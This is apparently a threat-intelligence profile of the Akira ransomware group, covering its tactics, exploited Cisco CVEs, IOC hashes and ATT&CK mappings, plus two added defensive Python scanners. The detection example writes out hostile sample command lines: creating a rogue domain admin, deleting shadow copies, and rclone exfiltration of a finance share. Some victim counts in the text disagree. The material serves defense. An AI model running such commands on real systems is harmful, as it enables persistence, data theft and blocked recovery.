Executive Summary

First Identified:
March 2023

Operation Style:
Akira is a ransomware variant and ransomware deployment entity active since at least March 2023. Akira uses compromised credentials to access single-factor external access mechanisms such as VPNs for initial access, then various publicly available tools and techniques for lateral movement. Akira operations are associated with “double extortion” ransomware activity, where data is exfiltrated from victim environments prior to encryption, with threats to publish files if a ransom is not paid. Technical analysis of Akira ransomware indicates multiple overlaps with and similarities to Conti malware.

Extortion method:
Double Extortion – combining the traditional ransomware extortion method (encryption) with exfiltration of victim’s sensitive data; the group threatens to leak the data via a data leak site if the ransom demand is not paid.

Most Frequently Targeted Industry:
Education, Finance, Manufacturing, and Healthcare.

Most Frequently Targeted Victim HQ region:
North America, Europe, and Australia.

Known Associations:
GOLD SAHARA, PUNK SPIDER.

Description

The Akira ransomware group has been active since March 2023, targeting diverse industries across North America, the UK, and Australia. Operating as a Ransomware-as-a-Service (RaaS) model, Akira employs a double-extortion strategy by stealing sensitive data before encrypting it. According to their leak site, the group claims to have compromised over 350 organizations. 

From November 13 to 14, the Akira ransomware group posted over 30 new victims on their data leak site, marking their highest single-day total since they began operations in March 2023. This milestone represents a record-breaking escalation in their activities and the volume of leaks shared in one day.  

The Akira ransomware blog is organized into five sections. The “Leaks” section lists victims who refused to pay the ransom, leading the group to publicly release their encrypted data. The “News” section highlights new victims, likely organizations currently engaged in ransom negotiations. 

In the ‘Leaks’ section we’ve seen 3 victims that had already been published in the ‘News’ section, and 29 new ones. In the ‘News’ section, we’ve seen 3 new victims. This means that 32 new victims were published on the group’s DLS, and three more refused to pay the ransom and were added to the ‘Leaks’ section.

Since March 2023, Akira ransomware has impacted a wide range of businesses and critical infrastructure entities in North America, Europe, and Australia. In April 2023, following an initial focus on Windows systems, Akira threat actors deployed a Linux variant targeting VMware ESXi virtual machines. As of January 1, 2024, the ransomware group has impacted over 250 organizations and claimed approximately $42 million (USD) in ransomware proceeds.

Early versions of the Akira ransomware variant were written in C++ and encrypted files with a .akira extension; however, beginning in August 2023, some Akira attacks began deploying Megazord, using Rust-based code which encrypts files with a .powerranges extension. Akira threat actors have continued to use both Megazord and Akira, including Akira_v2 (identified by trusted third party investigations), interchangeably.

The FBI, CISA, EC3, and NCSC-NL encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.

Previous Target: Akira

Of the 35 total posts, 25 originate from the United States. Canada accounts for two, while the remaining posts come from Uruguay, Denmark, Germany, the United Kingdom, Sweden, the Czech Republic, and Nigeria.

The Business Services sector is the most frequently targeted, with 10 organizations affected. Other impacted industries include Manufacturing, Construction, Retail, Technology, Education, and Critical Infrastructure.

From November 13 to 14, the Akira ransomware group posted over 30 new victims on their data leak site, marking their highest single-day total since they began operations in March 2023.

As of January 1, 2024, the ransomware group has impacted over 250 organizations and claimed approximately $42 million (USD) in ransomware proceeds.

Data Leak Site: Akira


Known Exploited CVEs

(CVE-2023-20269)

A vulnerability in the remote access VPN feature of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct a brute force attack in an attempt to identify valid username and password combinations or an authenticated, remote attacker to establish a clientless SSL VPN session with an unauthorized user. This vulnerability is due to improper separation of authentication, authorization, and accounting (AAA) between the remote access VPN feature and the HTTPS management and site-to-site VPN features.

(CVE-2020-3259)

A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to retrieve memory contents on an affected device, which could lead to the disclosure of confidential information. The vulnerability is due to a buffer tracking issue when the software parses invalid URLs that are requested from the web services interface. An attacker could exploit this vulnerability by sending a crafted GET request to the web services interface. A successful exploit could allow the attacker to retrieve memory contents, which could lead to the disclosure of confidential information. Note: This vulnerability affects only specific AnyConnect and WebVPN configurations.


Associations: Akira

PUNK SPIDER
PUNK SPIDER is the Big Game Hunting (BGH) adversary (first identified in April 2023) responsible for developing and maintaining Akira ransomware and its associated Akira dedicated leak site (DLS). Tactics, Techniques, and Procedures (TTPs) associated with Akira ransomware deployments include significant use of legitimate repurposed software and Open-Source penetration-testing tools.

GOLD SAHARA
GOLD SAHARA is a cybercrime group that deploys Akira ransomware. The first Akira victim was named on a dedicated leak site in April 2023. There is no evidence that Akira is operated as ransomware-as-a-service (RaaS), but the rate of naming victims on the Akira leak site, at around 30 a month, suggests a large group of individuals is responsible for ransomware deployment.

GOLD SAHARA exclusively uses off-the-shelf tools and built-in utilities to conduct its operations. After compromising VPN accounts for initial access, the group uses Advanced IP Scanner and the SoftPerfect Network Scanner for network discovery, and the built-in Nltest Windows utility to identify domain trusts and domain controllers. It uses AnyDesk and PuTTY for remote access, and the WinRAR archiving tool to stage data for exfiltration using Rclone. The group has also been observed accessing and downloading SharePoint files to use in extortion attempts. Prior to deploying ransomware, GOLD SAHARA deletes administrator accounts, likely to hinder recovery efforts.

Known Tools: Akira

indicates behaviors that have been observed by DarkAtlas Team.

Malicious Files Affiliated with Akira Ransomware:

File Name | Hash (SHA-256) | Description
w.exe | d2fd0654710c27dcf37b6c1437880020824e161dd0bf28e3a133ed777242a0ca | Akira ransomware
Win.exe | dcfa2800754e5722acf94987bb03e814edcb9acebda37df6da1987bf48e5b05e | Akira ransomware encryptor
AnyDesk.exe | bc747e3bf7b6e02c09f3d18bdd0e64eef62b940b2f16c9c72e647eec85cf0138 | Remote desktop application
Gcapi.dll | 73170761d6776c0debacfbbc61b6988cb8270a20174bf5c049768a264bb8ffaf | DLL file that assists with the execution of AnyDesk.exe
Sysmon.exe | 1b60097bf1ccb15a952e5bcc3522cf5c162da68c381a76abc2d5985659e4d386 | Ngrok tool for persistence
Config.yml | Varies by use | Ngrok configuration file
Rclone.exe | aaa647327ba5b855bedea8e889b3fafdc05a6ca75d1cfd98869432006d6fecc9 | Exfiltration tool
Winscp.rnd | 7d6959bb7a9482e1caa83b16ee01103d982d47c70c72fdd03708e2b7f4c552c4 | Network file transfer program
WinSCP-6.1.2-Setup.exe | 36cc31f0ab65b745f25c7e785df9e72d1c8919d35a1d7bd4ce8050c8c068b13c | Network file transfer program
Akira_v2 | 3298d203c2acb68c474e5fdad8379181890b4403d6491c523c13730129be3f75 | Akira_v2 ransomware
Akira_v2 | 0ee1d284ed663073872012c7bde7fac5ca1121403f1a5d2d5411317df282796c | Akira_v2 ransomware
Megazord | ffd9f58e5fe8502249c67cad0123ceeeaa6e9f69b4ec9f9e21511809849eb8fc | Akira “Megazord” ransomware
Megazord | dfe6fddc67bdc93b9947430b966da2877fda094edf3e21e6f0ba98a84bc53198 | Akira “Megazord” ransomware
Megazord | 131da83b521f610819141d5c740313ce46578374abb22ef504a7593955a65f07 | Akira “Megazord” ransomware
Megazord | 9f393516edf6b8e011df6ee991758480c5b99a0efbfd68347786061f0e04426c | Akira “Megazord” ransomware
Megazord | 9585af44c3ff8fd921c713680b0c2b3bbc9d56add848ed62164f7c9b9f23d065 | Akira “Megazord” ransomware
Megazord | 2f629395fdfa11e713ea8bf11d40f6f240acf2f5fcf9a2ac50b6f7fbc7521c83 | Akira “Megazord” ransomware
Megazord | 7f731cc11f8e4d249142e99a44b9da7a48505ce32c4ee4881041beeddb3760be | Akira “Megazord” ransomware
Megazord | 95477703e789e6182096a09bc98853e0a70b680a4f19fa2bf86cbb9280e8ec5a | Akira “Megazord” ransomware
Megazord | 0c0e0f9b09b80d87ebc88e2870907b6cacb4cd7703584baf8f2be1fd9438696d | Akira “Megazord” ransomware
Megazord | c9c94ac5e1991a7db42c7973e328fceeb6f163d9f644031bdfd4123c7b3898b0 | Akira “Megazord” ransomware
VeeamHax.exe | aaa6041912a6ba3cf167ecdb90a434a62feaf08639c59705847706b9f492015d | Plaintext credential leaking tool
Veeam-Get-Creds.ps1 | 18051333e658c4816ff3576a2e9d97fe2a1196ac0ea5ed9ba386c46defafdb88 | PowerShell script for obtaining and decrypting accounts from Veeam servers
PowershellKerberos TicketDumper | 5e1e3bf6999126ae4aa52146280fdb913912632e8bac4f54e98c58821a307d32 | Kerberos ticket dumping tool from LSA cache
sshd.exe | 8317ff6416af8ab6eb35df3529689671a700fdb61a5e6436f4d6ea8ee002d694 | OpenSSH backdoor
ipscan-3.9.1-setup.exe | 892405573aa34dfc49b37e4c35b655543e88ec1c5e8ffb27ab8d1bbf90fc6ae0 | Network scanner that scans IP addresses and ports
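The table above is most useful when it can be swept against a file system. The following is an added example, not code from the report or from DarkAtlas: it streams SHA-256 over every file under a directory, compares the digests with a subset of the hashes copied from the table, and also flags the file names and encrypted-file extensions the report mentions (w.exe, fn.txt, akiranew.txt, .akira, .powerranges, .akiranew). The directory built by demo() is constructed for illustration, and the "constructed test indicator" hash it registers is not an Akira indicator.

```python
"""SHA-256 and filename sweep against the indicators in the table above.

Added example, not code from the report or from DarkAtlas. The hash values
are copied from the table; the directory layout in demo() is constructed."""
import hashlib
import tempfile
from dataclasses import dataclass
from pathlib import Path

# Subset of the SHA-256 indicators from the table above, keyed lowercase.
AKIRA_SHA256 = {
    "d2fd0654710c27dcf37b6c1437880020824e161dd0bf28e3a133ed777242a0ca": "Akira ransomware (w.exe)",
    "dcfa2800754e5722acf94987bb03e814edcb9acebda37df6da1987bf48e5b05e": "Akira ransomware encryptor (Win.exe)",
    "1b60097bf1ccb15a952e5bcc3522cf5c162da68c381a76abc2d5985659e4d386": "Ngrok renamed to Sysmon.exe",
    "aaa647327ba5b855bedea8e889b3fafdc05a6ca75d1cfd98869432006d6fecc9": "Rclone.exe exfiltration tool",
    "3298d203c2acb68c474e5fdad8379181890b4403d6491c523c13730129be3f75": "Akira_v2 ransomware",
    "ffd9f58e5fe8502249c67cad0123ceeeaa6e9f69b4ec9f9e21511809849eb8fc": "Akira Megazord ransomware",
    "8317ff6416af8ab6eb35df3529689671a700fdb61a5e6436f4d6ea8ee002d694": "sshd.exe OpenSSH backdoor",
}

# File names from the table plus the ransom-note names given in the report.
SUSPICIOUS_NAMES = {
    "w.exe": "Akira ransomware",
    "fn.txt": "Akira ransom note",
    "akiranew.txt": "Akira_v2 (ESXi) ransom note",
    "veeamhax.exe": "Veeam credential leaking tool",
    "veeam-get-creds.ps1": "Veeam credential dumping script",
}

# Extensions the report says encrypted files receive.
ENCRYPTED_EXTENSIONS = {".akira", ".powerranges", ".akiranew"}


@dataclass(frozen=True)
class Finding:
    path: str
    kind: str      # "sha256", "filename" or "extension"
    detail: str


def sha256_file(path, chunk_size=1 << 20):
    """Stream the file so large archives do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk_size), b""):
            h.update(block)
    return h.hexdigest()


def scan(root, iocs=AKIRA_SHA256):
    """Walk root and return one Finding per indicator hit (a file may hit several)."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file():
            continue
        name = path.name.lower()
        if name in SUSPICIOUS_NAMES:
            findings.append(Finding(str(path), "filename", SUSPICIOUS_NAMES[name]))
        if path.suffix.lower() in ENCRYPTED_EXTENSIONS:
            findings.append(Finding(str(path), "extension", f"encrypted-file extension {path.suffix}"))
            continue  # hashing ciphertext tells us nothing
        try:
            digest = sha256_file(path)
        except OSError:
            continue  # locked or unreadable; a real sweep should report these separately
        if digest in iocs:
            findings.append(Finding(str(path), "sha256", iocs[digest]))
    return findings


def demo():
    """Scan a constructed directory: one file whose hash is registered as an
    indicator for this demo, one ransom note matched by name, one file with an
    encrypted-file extension, and one benign file."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "tool.exe").write_bytes(b"constructed sample, not malware")
        (root / "fn.txt").write_text("constructed ransom note text")
        (root / "report.docx.akira").write_bytes(b"\x00" * 32)
        (root / "readme.txt").write_text("benign file")
        iocs = dict(AKIRA_SHA256)
        iocs[hashlib.sha256(b"constructed sample, not malware").hexdigest()] = "constructed test indicator"
        return scan(root, iocs)


if __name__ == "__main__":
    for f in demo():
        print(f"{f.kind:9} {f.detail:32} {f.path}")
```

A sweep like this only catches the exact binaries listed; the Config.yml row in the table shows why name and path context matter as much as hashes, since the Ngrok configuration varies per deployment and has no fixed digest.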

Observed Akira Behaviors: Windows

Initial Access

The FBI and cybersecurity researchers have observed Akira threat actors obtaining initial access to organizations through a virtual private network (VPN) service without multifactor authentication (MFA) configured, mostly using known Cisco vulnerabilities. Additional methods of initial access include the use of external-facing services such as Remote Desktop Protocol (RDP), spear phishing, and the abuse of valid credentials.

Persistence and Discovery

Once initial access is obtained, Akira threat actors attempt to abuse the functions of domain controllers by creating new domain accounts to establish persistence. In some instances, the FBI identified Akira threat actors creating an administrative account named itadm.

According to FBI and open source reporting, Akira threat actors leverage post-exploitation attack techniques, such as Kerberoasting, to extract credentials stored in the process memory of the Local Security Authority Subsystem Service (LSASS). Akira threat actors also use credential scraping tools like Mimikatz and LaZagne to aid in privilege escalation. Tools like SoftPerfect and Advanced IP Scanner are often used for network device discovery (reconnaissance) purposes, and net Windows commands are used to identify domain controllers and gather information on domain trust relationships.

Defense Evasion

Based on trusted third party investigations, Akira threat actors have been observed deploying two distinct ransomware variants against different system architectures within the same compromise event. This marks a shift from recently reported Akira ransomware activity. Akira threat actors were first observed deploying the Windows-specific “Megazord” ransomware, with further analysis revealing that a second payload was concurrently deployed in this attack (which was later identified as a novel variant of the Akira ESXi encryptor, “Akira_v2”).

As Akira threat actors prepare for lateral movement, they commonly disable security software to avoid detection. Cybersecurity researchers have observed Akira threat actors using PowerTool to exploit the Zemana AntiMalware driver.

Exfiltration and Impact

Akira threat actors leverage tools such as FileZilla, WinRAR, WinSCP, and RClone to exfiltrate data. To establish command and control channels, threat actors leverage readily available tools like AnyDesk, MobaXterm, RustDesk, Ngrok, and Cloudflare Tunnel. Exfiltration is carried out over protocols such as File Transfer Protocol (FTP) and Secure File Transfer Protocol (SFTP), and through cloud storage services like Mega, to connect to exfiltration servers.

Akira threat actors use a double-extortion model after exfiltrating data. The Akira ransom note provides each company with a unique code and instructions to contact the threat actors via a .onion URL. Akira threat actors do not leave an initial ransom demand or payment instructions on compromised networks, and do not relay this information until contacted by the victim. Ransom payments are paid in Bitcoin to cryptocurrency wallet addresses provided by the threat actors. To further apply pressure, Akira threat actors threaten to publish exfiltrated data on the Tor network, and in some instances have called victimized companies, according to FBI reporting.

Encryption

Akira threat actors utilize a sophisticated hybrid encryption scheme to lock data. This involves combining a ChaCha20 stream cipher with an RSA public-key cryptosystem for speed and secure key exchange. This multilayered approach tailors encryption methods based on file type and size and is capable of full or partial encryption. Encrypted files are appended with either a .akira or .powerranges extension. To further inhibit system recovery, Akira’s encryptor (w.exe) utilizes PowerShell commands to delete volume shadow copies (VSS) on Windows systems. Additionally, a ransom note named fn.txt appears in both the root directory (C:) and each user’s home directory (C:\Users).
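The persistence, discovery, exfiltration and shadow-copy deletion behaviors described in the sections above translate directly into process-creation detections. The following is an added example, not code from the report or from DarkAtlas: it runs a handful of command-line rules over constructed Sysmon-style events and tags each hit with the ATT&CK ID used in this report's tables. The host names, users and command lines are constructed, and the rule patterns are assumptions drawn from the tools named in the text (net, nltest, PowerShell shadow-copy removal, Rclone), not observed Akira command lines.

```python
"""Command-line detections for the Akira behaviors described above.

Added example, not code from the report or from DarkAtlas. The event records
are constructed; the patterns are assumptions based on the tools the report
names, not the group's actual command lines."""
import re
from dataclasses import dataclass

# Constructed process-creation records in the shape of Sysmon Event ID 1 /
# Windows Security 4688 data, reduced to the fields the rules need.
SAMPLE_EVENTS = [
    {"host": "DC01", "user": "CORP\\alice", "parent": "cmd.exe",
     "cmdline": "net user itadm P@ssw0rd! /add /domain"},
    {"host": "WS01", "user": "CORP\\alice", "parent": "cmd.exe",
     "cmdline": "nltest /dclist:corp.local"},
    {"host": "FS02", "user": "NT AUTHORITY\\SYSTEM", "parent": "w.exe",
     "cmdline": 'powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | Remove-WmiObject"'},
    {"host": "FS02", "user": "CORP\\alice", "parent": "cmd.exe",
     "cmdline": "rclone.exe copy \\\\fs02\\finance mega:staging --transfers 8"},
    {"host": "WS07", "user": "CORP\\bob", "parent": "explorer.exe",
     "cmdline": "net use \\\\printsrv\\queue"},   # benign: must not alert
]

# (rule name, ATT&CK ID as used in this report's tables, pattern)
RULES = [
    ("Account created with 'net user ... /add'", "T1136.002",
     re.compile(r"\bnet1?(?:\.exe)?\s+user\s+\S+.*\s/add\b", re.I)),
    ("Domain controller enumeration with nltest", "T1018",
     re.compile(r"\bnltest(?:\.exe)?\s+/dclist", re.I)),
    ("Volume shadow copy deletion", "T1490",
     re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows"
                r"|wmic(?:\.exe)?\s+shadowcopy\s+delete"
                r"|win32_shadowcopy.*remove-wmiobject", re.I)),
    ("Rclone copy/sync to a configured remote", "T1567.002",
     # a remote is 'name:' not followed by a path separator, which keeps a
     # Windows drive letter such as C:\ from matching
     re.compile(r"\brclone(?:\.exe)?\s+(?:copy|sync|move)\b.*\s[\w-]+:(?![\\/])", re.I)),
]

# Pulls the account name out of 'net user <name> ... /add'.
ACCOUNT_RE = re.compile(r"\bnet1?(?:\.exe)?\s+user\s+(\S+)\s+.*?/add\b", re.I)


@dataclass(frozen=True)
class Alert:
    host: str
    user: str
    parent: str
    rule: str
    technique: str
    cmdline: str


def evaluate(events):
    """Run every rule over every event; one Alert per (event, rule) hit."""
    alerts = []
    for ev in events:
        for name, tid, pattern in RULES:
            if pattern.search(ev["cmdline"]):
                alerts.append(Alert(ev["host"], ev["user"], ev["parent"], name, tid, ev["cmdline"]))
    return alerts


def created_accounts(events):
    """Account names passed to 'net user <name> ... /add'. The report notes an
    administrative account named itadm in some Akira intrusions, so a hit on
    that exact name deserves immediate triage."""
    names = []
    for ev in events:
        m = ACCOUNT_RE.search(ev["cmdline"])
        if m:
            names.append(m.group(1))
    return names


def shadow_copy_deletions_from_unusual_parent(alerts, expected=("cmd.exe", "explorer.exe", "mmc.exe")):
    """Shadow-copy deletions whose parent is not an interactive admin shell,
    e.g. an encryptor binary such as w.exe spawning PowerShell as the report describes."""
    return [(a.host, a.parent) for a in alerts
            if a.technique == "T1490" and a.parent.lower() not in expected]


if __name__ == "__main__":
    hits = evaluate(SAMPLE_EVENTS)
    for a in hits:
        print(f"{a.host:5} {a.technique:10} {a.rule:45} {a.cmdline}")
    print("accounts created:", created_accounts(SAMPLE_EVENTS))
    print("VSS deletion from unusual parent:", shadow_copy_deletions_from_unusual_parent(hits))
```

The parent-process check is the piece worth keeping even where the command-line patterns drift: administrators do delete shadow copies from cmd.exe, but an unsigned binary in a temp directory launching PowerShell to do it is the pattern the Encryption section describes.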

Trusted third party analysis identified that the Akira_v2 encryptor is an upgrade from its previous version, which includes additional functionalities due to the language it’s written in (Rust). Previous versions of the encryptor provided options to insert arguments at runtime, including:

  • -p --encryption_path (targeted file/folder paths)
  • -s --share_file (targeted network drive path)
  • -n --encryption_percent (percentage of encryption)
  • --fork (create a child process for encryption)

The ability to insert additional threads allows Akira threat actors to have more granular control over the number of CPU cores in use, increasing the speed and efficiency of the encryption process. The new version also adds a layer of protection, utilizing the Build ID as a run condition to hinder dynamic analysis. The encryptor is unable to execute successfully without the unique Build ID. The ability to deploy against only virtual machines using “vmonly” and the ability to stop running virtual machines with “stopvm” functionalities have also been observed implemented for Akira_v2. After encryption, the Linux ESXi variant may include the file extension “akiranew” or add a ransom note named “akiranew.txt” in directories where files were encrypted with the new nomenclature.

MITRE ATT&CK® Mappings: Akira

Techniques Used

Table 1: Initial Access

Technique Title | ID | Use
Valid Accounts | T1078 | Akira threat actors obtain and abuse credentials of existing accounts as a means of gaining initial access.
Exploit Public-Facing Application | T1190 | Akira threat actors exploit vulnerabilities in internet-facing systems to gain access to systems.
External Remote Services | T1133 | Akira threat actors have used remote access services, such as RDP/VPN connections, to gain initial access.
Phishing: Spearphishing Attachment | T1566.001 | Akira threat actors use phishing emails with malicious attachments to gain access to networks.
Phishing: Spearphishing Link | T1566.002 | Akira threat actors use phishing emails with malicious links to gain access to networks.

Table 2: Credential Access

Technique Title | ID | Use
OS Credential Dumping | T1003 | Akira threat actors use tools like Mimikatz and LaZagne to dump credentials.
OS Credential Dumping: LSASS Memory | T1003.001 | Akira threat actors attempt to access credential material stored in the process memory of the LSASS.

Table 3: Discovery

Technique Title | ID | Use
System Network Configuration Discovery | T1016 | Akira threat actors use tools to scan systems and identify services running on remote hosts and local network infrastructure.
System Information Discovery | T1082 | Akira threat actors use tools like PCHunter64 to acquire detailed process and system information.
Domain Trust Discovery | T1482 | Akira threat actors use the net Windows command to enumerate domain information.
Process Discovery | T1057 | Akira threat actors use the Tasklist utility to obtain details on running processes via PowerShell.
Permission Groups Discovery: Local Groups | T1069.001 | Akira threat actors use the net localgroup /dom command to find local system groups and permission settings.
Permission Groups Discovery: Domain Groups | T1069.002 | Akira threat actors use the net group /domain command to attempt to find domain level groups and permission settings.
Remote System Discovery | T1018 | Akira threat actors use nltest /dclist to amass a listing of other systems by IP address, hostname, or other logical identifiers on a network.

Table 4: Persistence

Technique Title | ID | Use
Create Account: Domain Account | T1136.002 | Akira threat actors attempt to abuse the functions of domain controllers by creating new domain accounts to establish persistence.

Table 5: Defense Evasion

Technique Title | ID | Use
Impair Defenses: Disable or Modify Tools | T1562.001 | Akira threat actors use BYOVD attacks to disable antivirus software.

Table 6: Command and Control

Technique Title | ID | Use
Remote Access Software | T1219 | Akira threat actors use legitimate desktop support software like AnyDesk to obtain remote access to victim systems.
Proxy | T1090 | Akira threat actors utilized Ngrok to create a secure tunnel to servers that aided in exfiltration of data.

Table 7: Collection

Technique Title | ID | Use
Archive Collected Data: Archive via Utility | T1560.001 | Akira threat actors use tools like WinRAR to compress files.

Table 8: Exfiltration

Technique Title | ID | Use
Exfiltration Over Alternative Protocol | T1048 | Akira threat actors use file transfer tools like WinSCP to transfer data.
Transfer Data to Cloud Account | T1537 | Akira threat actors use tools like CloudZilla to exfiltrate data to a cloud account and connect to exfiltration servers they control.
Exfiltration Over Web Service: Exfiltration to Cloud Storage | T1567.002 | Akira threat actors leveraged RClone to sync files with cloud storage services to exfiltrate data.

Table 9: Impact

Technique Title | ID | Use
Data Encrypted for Impact | T1486 | Akira threat actors encrypt data on target systems to interrupt availability to system and network resources.
Inhibit System Recovery | T1490 | Akira threat actors delete volume shadow copies on Windows systems.
Financial Theft | T1657 | Akira threat actors use a double-extortion model for financial gain.

Conclusion

The Akira ransomware group has emerged as a formidable threat since its first appearance in March 2023, targeting over 250 organizations and amassing approximately $42 million in ransomware proceeds. Operating under a double-extortion model, Akira combines data encryption with the exfiltration of sensitive information, pressuring victims to pay by threatening public exposure. The group’s tactics involve leveraging compromised VPN credentials and known vulnerabilities in Cisco products to gain initial access, followed by network reconnaissance, privilege escalation, and data exfiltration using widely available tools such as AnyDesk, RClone and WinSCP.

The ransomware has evolved over time, initially written in C++ and later incorporating Rust-based code in the Megazord variant. This shift reflects the group’s commitment to enhancing encryption speed and resilience against detection. The targeting of diverse industries, including business services, manufacturing, technology, and critical infrastructure, highlights the widespread and indiscriminate nature of Akira’s operations.

To mitigate the threat posed by Akira ransomware, organizations are urged to strengthen their cybersecurity posture by implementing multi-factor authentication (MFA), securing VPN access, and maintaining regular data backups. The Akira group’s rapid adaptation to defensive measures underscores the need for continuous monitoring and proactive threat intelligence to stay ahead of this evolving threat landscape.